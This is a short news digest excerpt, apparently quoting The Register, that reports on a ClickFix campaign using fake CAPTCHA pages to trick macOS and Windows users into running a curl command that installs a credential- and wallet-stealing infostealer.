"ClickFix is a super popular social engineering tactic used to trick people into executing malicious commands on their own computers, usually by clicking a fake computer problem fix or CAPTCHA prompt."
"Upon detecting a desktop environment, the malware directs users to a fake CAPTCHA page, performs another inspection to determine the specific desktop OS, and then checks for macOS-specific strings within the user-agent."
"The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a 'verification code' into the search feature. The phony code is a curl command, and as soon as the victim hits Enter and executes it on their computer, the command silently downloads a malicious script."
The ClickFix campaign employs social engineering to trick macOS users into executing a malicious AppleScript that steals credentials and session cookies. The malware targets 14 browsers, 16 cryptocurrency wallets, and over 200 extensions. Victims are primarily in Asia's finance sector. The attack uses a fake CAPTCHA to prompt users to execute a command that downloads the infostealer. The malware operates on both Windows and macOS, filtering victims based on user-agent to deliver the appropriate payload.
Read at Theregister
Unable to calculate read time
Collection
[
|
...
]